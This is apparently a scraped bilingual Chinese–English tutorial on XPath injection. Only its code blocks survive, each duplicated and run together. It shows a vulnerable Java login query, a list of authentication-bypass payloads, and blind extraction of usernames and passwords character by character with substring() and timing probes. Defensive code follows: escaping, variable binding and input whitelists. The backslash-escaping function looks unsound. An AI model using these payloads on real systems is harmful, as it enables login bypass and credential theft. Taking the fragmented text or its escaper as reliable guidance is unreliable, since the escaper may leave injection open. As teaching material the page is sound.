Loading...
Loading...
Compare original and translation side by side
String xpath = "//user[username='" + username + "' and password='" + password + "']";
XPathExpression expr = xpath.compile(xpath);
NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);String xpath = "//user[username='" + username + "' and password='" + password + "']";
XPathExpression expr = xpath.compile(xpath);
NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);//user[username='admin']
//user[@id='1']
//user[username='admin' and password='pass']
//user[username='admin' or username='user']//user[username='admin']
//user[@id='1']
//user[username='admin' and password='pass']
//user[username='admin' or username='user']text()count()substring()string-length()contains()text()count()substring()string-length()contains()' or '1'='1
' or '1'='1' or '
' or 1=1 or '
') or ('1'='1' or '1'='1
' and '1'='2
' or 1=1 or '' or '1'='1
' or '1'='1' or '
' or 1=1 or '
') or ('1'='1' or '1'='1
' and '1'='2
' or 1=1 or '用户名: admin' or '1'='1
密码: anything
查询: //user[username='admin' or '1'='1' and password='anything']用户名: admin') or ('1'='1
查询: //user[username='admin') or ('1'='1' and password='*']Username: admin' or '1'='1
Password: anything
Query: //user[username='admin' or '1'='1' and password='anything']Username: admin') or ('1'='1
Query: //user[username='admin') or ('1'='1' and password='*']' or 1=1 or '
' or '1'='1
') or 1=1 or ('' or count(//user)>0 or '' or substring(//user[1]/username,1,1)='a' or '' or 1=1 or '
' or '1'='1
') or 1=1 or ('' or count(//user)>0 or '' or substring(//user[1]/username,1,1)='a' or '输入: admin' or '1'='1
查询: //user[username='admin' or '1'='1' and password='*']
结果: 匹配所有用户输入: admin')] | //* | //*[('
查询: //user[username='admin')] | //* | //*[('' and password='*']' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,1,1)='b' or 'Input: admin' or '1'='1
Query: //user[username='admin' or '1'='1' and password='*']
Result: Matches all usersInput: admin')] | //* | //*[('
Query: //user[username='admin')] | //* | //*[('' and password='*']' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,1,1)='b' or '' or 1=1 or '
结果: 返回所有用户节点' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,2,1)='d' or '
逐步获取每个字符' or substring(//user[1]/password,1,1)='p' or '
逐步获取密码字符' or 1=1 or '
Result: Returns all user nodes' or substring(//user[1]/username,1,1)='a' or '
' or substring(//user[1]/username,2,1)='d' or '
Retrieve each character step by step' or substring(//user[1]/password,1,1)='p' or '
Retrieve password characters step by step' or count(//user[substring(username,1,1)='a'])>0 and sleep(5) or '' or substring(//user[1]/username,1,1)='a' or '
观察响应差异' or count(//user[substring(username,1,1)='a'])>0 and sleep(5) or '' or substring(//user[1]/username,1,1)='a' or '
Observe response differences' or '1'='1 → %27%20or%20%271%27%3D%271' → '
" → "
< → <
> → >' or '1'='1 → %27%20or%20%271%27%3D%271' → '
" → "
< → <
> → >' or 1=1 or '
' or '1'='1' or '' or 1=1 or '
' or '1'='1' or 'substring(//user[1]/username,1,1)
substring(//user[position()=1]/username,1,1)
//user[1]/username/text()[1]substring(//user[1]/username,1,1)
substring(//user[position()=1]/username,1,1)
//user[1]/username/text()[1]from lxml import etree
from lxml.etree import XPathfrom lxml import etree
from lxml.etree import XPathundefinedundefinedprivate static final String[] XPATH_ESCAPE_CHARS =
{"'", "\"", "[", "]", "(", ")", "=", ">", "<", " "};
public static String escapeXPath(String input) {
if (input == null) {
return null;
}
StringBuilder sb = new StringBuilder();
for (int i = 0; i < input.length(); i++) {
char c = input.charAt(i);
if (Arrays.asList(XPATH_ESCAPE_CHARS).contains(String.valueOf(c))) {
sb.append("\\");
}
sb.append(c);
}
return sb.toString();
}// 使用XPath变量
String xpath = "//user[username=$username and password=$password]";
XPathExpression expr = xpath.compile(xpath);
XPathVariableResolver resolver = new MapVariableResolver(
Map.of("username", escapedUsername, "password", escapedPassword));
expr.setXPathVariableResolver(resolver);// 只允许特定字符
if (!input.matches("^[a-zA-Z0-9@._-]+$")) {
throw new IllegalArgumentException("Invalid input");
}// 预定义查询模板
private static final String LOGIN_QUERY =
"//user[username=$1 and password=$2]";
// 使用参数绑定private static final String[] XPATH_ESCAPE_CHARS =
{"'", "\"", "[", "]", "(", ")", "=", ">", "<", " "};
public static String escapeXPath(String input) {
if (input == null) {
return null;
}
StringBuilder sb = new StringBuilder();
for (int i = 0; i < input.length(); i++) {
char c = input.charAt(i);
if (Arrays.asList(XPATH_ESCAPE_CHARS).contains(String.valueOf(c))) {
sb.append("\\");
}
sb.append(c);
}
return sb.toString();
}// Use XPath variables
String xpath = "//user[username=$username and password=$password]";
XPathExpression expr = xpath.compile(xpath);
XPathVariableResolver resolver = new MapVariableResolver(
Map.of("username", escapedUsername, "password", escapedPassword));
expr.setXPathVariableResolver(resolver);// Only allow specific characters
if (!input.matches("^[a-zA-Z0-9@._-]+$")) {
throw new IllegalArgumentException("Invalid input");
}// Predefined query template
private static final String LOGIN_QUERY =
"//user[username=$1 and password=$2]";
// Use parameter binding